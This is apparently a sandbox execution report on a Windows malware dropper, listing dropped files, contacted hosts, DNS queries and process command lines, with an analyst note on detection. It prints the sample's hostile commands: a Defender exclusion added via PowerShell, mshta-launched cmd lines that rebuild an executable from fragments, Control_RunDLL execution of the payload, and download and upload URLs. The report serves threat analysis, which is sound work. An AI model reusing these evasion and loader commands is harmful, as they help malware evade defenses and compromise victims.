Technical Information (sandbox execution artifacts, in order: created/touched files, network connections, DNS queries, window classes, then process command lines; the `#` characters in hostnames/URLs are deliberate redactions, not garbling)

Analyst note: the command lines below are the most useful part of this listing. The sample adds a Windows Defender exclusion for `%LOCALAPPDATA%\Temp` via `Add-MpPreference` (both the cmd wrapper and the direct PowerShell invocation appear), which is a defense-evasion step worth alerting on in its own right. It also uses `mshta.exe` to run case-mangled `cmd` lines that write an `MZ` header with `echo|set /p` and then `copy /b` six separately dropped `%TEMP%` fragments into one file (`FUEj5.QM`), which is subsequently executed through `control.exe` / `rundll32.exe Shell32.dll,Control_RunDLL` — i.e. the reassembled payload is loaded as a Control Panel item rather than as a plain executable, so file-type-based detection on the fragments alone will miss it. Other entries to triage: `rundll32.exe "%TEMP%\sqlite.dll",global`, the forced `taskkill` of one of its own dropped components, multiple public IP-lookup endpoints, and a non-DNS connection to a domain on port 53; the Firefox default-browser-agent scheduled task listed first may be a pre-existing legitimate artifact of the sandbox image rather than something the sample created — confirm before including it as an IOC.
- <SYSTEM32>\tasks\firefox default browser agent 9f29dd4e4714a998
- '%WINDIR%\syswow64\taskkill.exe' -F -Im "Sun1324528697aa4.exe"
- <SYSTEM32>\svchost.exe
- %TEMP%\nsce179.tmp
- %TEMP%\is-9bnm7.tmp\sun13a143ed7209802.tmp
- %TEMP%\is-kju2r.tmp\_isetup\_setup64.tmp
- %TEMP%\is-kju2r.tmp\_isetup\_shfoldr.dll
- %TEMP%\is-kju2r.tmp\idp.dll
- %TEMP%\skvpvs3t6y8w.exe
- %TEMP%\is-kju2r.tmp\etalevzajet.exe
- %TEMP%\sqlite.dat
- %TEMP%\sqlite.dll
- %TEMP%\ylrxm6o.qz
- %TEMP%\3uii17.ui
- %TEMP%\ezzs.mdf
- %TEMP%\uts09z.aiz
- %TEMP%\jnyesn.co
- %APPDATA%\wrtdwvc
- %TEMP%\yw7bb.dee
- %TEMP%\7zsc7a5dae5\sun13f4b840733c76ef.exe
- %TEMP%\fuej5.qm
- %TEMP%\7zsc7a5dae5\sun13c13ae1e3.exe
- %TEMP%\7zsc7a5dae5\sun13b1860c0df5055e.exe
- %TEMP%\setup_installer.exe
- %TEMP%\7zsc7a5dae5\libcurl.dll
- %TEMP%\7zsc7a5dae5\libcurlpp.dll
- %TEMP%\7zsc7a5dae5\libgcc_s_dw2-1.dll
- %TEMP%\7zsc7a5dae5\libstdc++-6.dll
- %TEMP%\7zsc7a5dae5\libwinpthread-1.dll
- %TEMP%\7zsc7a5dae5\setup_install.exe
- %TEMP%\7zsc7a5dae5\sun13215a62c60cae.exe
- %TEMP%\7zsc7a5dae5\sun1324528697aa4.exe
- %TEMP%\7zsc7a5dae5\sun13276ed57dfb2de5.exe
- %TEMP%\7zsc7a5dae5\sun1362f79061e8909fc.exe
- %TEMP%\7zsc7a5dae5\sun139692e84c939.exe
- %TEMP%\7zsc7a5dae5\sun13a143ed7209802.exe
- %TEMP%\7zsc7a5dae5\sun13ac0024b1.exe
- %TEMP%\7zsc7a5dae5\sun13ae556fed5.exe
- %TEMP%\7zsc7a5dae5\sun13b7886ca564.exe
- %TEMP%\{gkf2-iruxd-glcz-gjdp0}\52487506420.exe
- %APPDATA%\wrtdwvc
- %TEMP%\7zsc7a5dae5\libcurl.dll
- %TEMP%\7zsc7a5dae5\libcurlpp.dll
- %TEMP%\7zsc7a5dae5\libgcc_s_dw2-1.dll
- %TEMP%\7zsc7a5dae5\libstdc++-6.dll
- %TEMP%\7zsc7a5dae5\libwinpthread-1.dll
- %TEMP%\7zsc7a5dae5\setup_install.exe
- %TEMP%\7zsc7a5dae5\sun13215a62c60cae.exe
- %TEMP%\7zsc7a5dae5\sun13276ed57dfb2de5.exe
- %TEMP%\sqlite.dat
- 'localhost':49175
- 'to#.##gametoa.com':443
- 'microsoft.com':80
- 'co###ctini.net':443
- 'ap#.ip.sb':443
- 'st#####.##gitalcertvalidation.com':80
- 'cl#####-partners.ltd':80
- 'st#####mg.youtuuee.com':80
- 'ip##pi.com':80
- '19#.#45.227.161':80
- 'go####plusstore.com':80
- '65.##8.20.195':6774
- 'ma#.to':443
- 'sa###links.com':80
- 'li###ncode.com':443
- 'cd#.##scordapp.com':443
- 'cd#.##scordapp.com':80
- 't.###amec.com':443
- '37.#.8.119':80
- '45.##3.1.182':80
- 'hs##ns.xyz':80
- 'localhost':49177
- 'ip###ger.org':443
- 'di###a09.top':80
- http://hs##ns.xyz/addInstall.php?ke##############################################################################################################################################################...
- http://45.##3.1.182/proxies.txt
- http://37.#.8.119/base/api/statistics.php
- http://sa###links.com/Installer_Provider/UltraMediaBurner.exe
- http://19#.#45.227.161/dlc/sharing.php?pu########
- http://ip##pi.com/json/
- http://st#####.##gitalcertvalidation.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRJrF0xYA49jC3D83fgDGesaUkzIQQUf9OZ86BHDjEAVlYijrfMnt3KAYoCEAYJR5FkG19ljPHMaGsuvmc%3D
- http://st#####mg.youtuuee.com/api/fbtime
- http://cl#####-partners.ltd/stats/save.php?pu#################
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- http://di###a09.top/download.php?fi###########
- http://go####plusstore.com/upload/
- 'localhost':49175
- 'localhost':49177
- 'localhost':49178
- 't.###amec.com':443
- 'cd#.##scordapp.com':80
- 'cd#.##scordapp.com':443
- 'li###ncode.com':443
- 'ma#.to':443
- '65.##8.20.195':6774
- 'ap#.ip.sb':443
- 'co###ctini.net':443
- 'ip###ger.org':443
- DNS ASK hs##ns.xyz
- DNS ASK microsoft.com
- DNS ASK co###ctini.net
- DNS ASK ap#.ip.sb
- DNS ASK st#####.##gitalcertvalidation.com
- DNS ASK st#####mg.youtuuee.com
- DNS ASK to#.##gametoa.com
- DNS ASK kw##one.com
- DNS ASK ip###ger.org
- DNS ASK ch####utoparts.com
- DNS ASK be####orsale.com
- DNS ASK go####plusstore.com
- DNS ASK ma#.to
- DNS ASK sa###links.com
- DNS ASK li###ncode.com
- DNS ASK cd#.##scordapp.com
- DNS ASK cl#####-partners.ltd
- DNS ASK t.###amec.com
- DNS ASK ip##pi.com
- DNS ASK di###a09.top
- 'to#.##gametoa.com':53
- ClassName: 'ConsoleWindowClass' WindowName: ''
- ClassName: 'EDIT' WindowName: ''
- ClassName: '' WindowName: ''
- '%TEMP%\setup_installer.exe'
- '%TEMP%\7zsc7a5dae5\sun1362f79061e8909fc.exe'
- '%TEMP%\is-kju2r.tmp\etalevzajet.exe' /S /UID=burnerch2
- '%TEMP%\skvpvs3t6y8w.exe' /phmOv~geMVZhd~P51OGqJQYYUK
- '%TEMP%\is-9bnm7.tmp\sun13a143ed7209802.tmp' /SL5="$1100A4,506086,422400,%TEMP%\7zSC7A5DAE5\Sun13a143ed7209802.exe"
- '%TEMP%\7zsc7a5dae5\sun13ac0024b1.exe'
- '%TEMP%\7zsc7a5dae5\sun13c13ae1e3.exe'
- '%TEMP%\7zsc7a5dae5\sun13a143ed7209802.exe'
- '%TEMP%\7zsc7a5dae5\sun1324528697aa4.exe'
- '%TEMP%\{gkf2-iruxd-glcz-gjdp0}\52487506420.exe'
- '%TEMP%\7zsc7a5dae5\sun139692e84c939.exe'
- '%TEMP%\7zsc7a5dae5\sun13215a62c60cae.exe'
- '%TEMP%\7zsc7a5dae5\sun13b1860c0df5055e.exe' /mixone
- '%TEMP%\7zsc7a5dae5\sun13b7886ca564.exe'
- '%TEMP%\7zsc7a5dae5\sun13ae556fed5.exe'
- '%TEMP%\7zsc7a5dae5\setup_install.exe'
- '%TEMP%\7zsc7a5dae5\sun13276ed57dfb2de5.exe'
- '%TEMP%\7zsc7a5dae5\sun13f4b840733c76ef.exe'
- '%WINDIR%\syswow64\rundll32.exe' Shell32.dll,Control_RunDLL .\FUEj5.QM' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c start /I "" "%TEMP%\{GKf2-IrUxD-GLcz-GJdp0}\52487506420.exe"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c copY /Y "%TEMP%\7zSC7A5DAE5\Sun1324528697aa4.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( ...' (with hidden window)
- '%TEMP%\is-kju2r.tmp\etalevzajet.exe' /S /UID=burnerch2' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c copY /Y "%TEMP%\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U ...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.Q...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c start /I "" "%TEMP%\{GKf2-IrUxD-GLcz-GJdp0}\15033057961.exe" /mix' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%LOCALAPPDATA%\Temp"
- '%WINDIR%\syswow64\cmd.exe' /c start /I "" "%TEMP%\{GKf2-IrUxD-GLcz-GJdp0}\52487506420.exe"
- '<SYSTEM32>\svchost.exe' -k SystemNetworkService
- '%WINDIR%\syswow64\rundll32.exe' Shell32.dll,Control_RunDLL .\FUEj5.QM
- '%WINDIR%\syswow64\control.exe' .\FUEj5.QM
- '%WINDIR%\syswow64\cmd.exe' /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"
- '%WINDIR%\syswow64\cmd.exe' /S /D /c" eCHo "
- '<SYSTEM32>\rundll32.exe' "%TEMP%\sqlite.dll",global
- '%WINDIR%\syswow64\cmd.exe' /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.Q...
- '%WINDIR%\syswow64\mshta.exe' vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y...
- '%WINDIR%\syswow64\cmd.exe' /c copY /Y "%TEMP%\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U ...
- '%WINDIR%\syswow64\mshta.exe' vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("<SYSTEM32>\cmd.exe /c copY /Y ""%TEMP%\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && ...
- '%WINDIR%\syswow64\cmd.exe' /c copY /Y "%TEMP%\7zSC7A5DAE5\Sun1324528697aa4.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( ...
- '%WINDIR%\syswow64\cmd.exe' /c start /I "" "%TEMP%\{GKf2-IrUxD-GLcz-GJdp0}\15033057961.exe" /mix
- '%WINDIR%\syswow64\mshta.exe' vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("<SYSTEM32>\cmd.exe /c copY /Y ""%TEMP%\7zSC7A5DAE5\Sun1324528697aa4.exe"" SkVPVS3t6Y8...
- '%WINDIR%\syswow64\cmd.exe' /c Sun13f4b840733c76ef.exe
- '%WINDIR%\syswow64\cmd.exe' /c Sun13ac0024b1.exe
- '%WINDIR%\syswow64\cmd.exe' /c Sun13276ed57dfb2de5.exe
- '%WINDIR%\syswow64\cmd.exe' /c Sun1362f79061e8909fc.exe
- '%WINDIR%\syswow64\cmd.exe' /c Sun13a143ed7209802.exe
- '%WINDIR%\syswow64\cmd.exe' /c Sun13c13ae1e3.exe
- '%WINDIR%\syswow64\cmd.exe' /c Sun13b1860c0df5055e.exe /mixone
- '%WINDIR%\syswow64\cmd.exe' /c Sun1324528697aa4.exe
- '%WINDIR%\syswow64\cmd.exe' /c Sun13215a62c60cae.exe
- '%WINDIR%\syswow64\cmd.exe' /c Sun139692e84c939.exe
- '%WINDIR%\syswow64\cmd.exe' /c Sun13b7886ca564.exe
- '%WINDIR%\syswow64\cmd.exe' /c Sun13ae556fed5.exe
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%LOCALAPPDATA%\Temp"
- '<SYSTEM32>\rundll32.exe' Shell32.dll,Control_RunDLL .\FUEj5.QM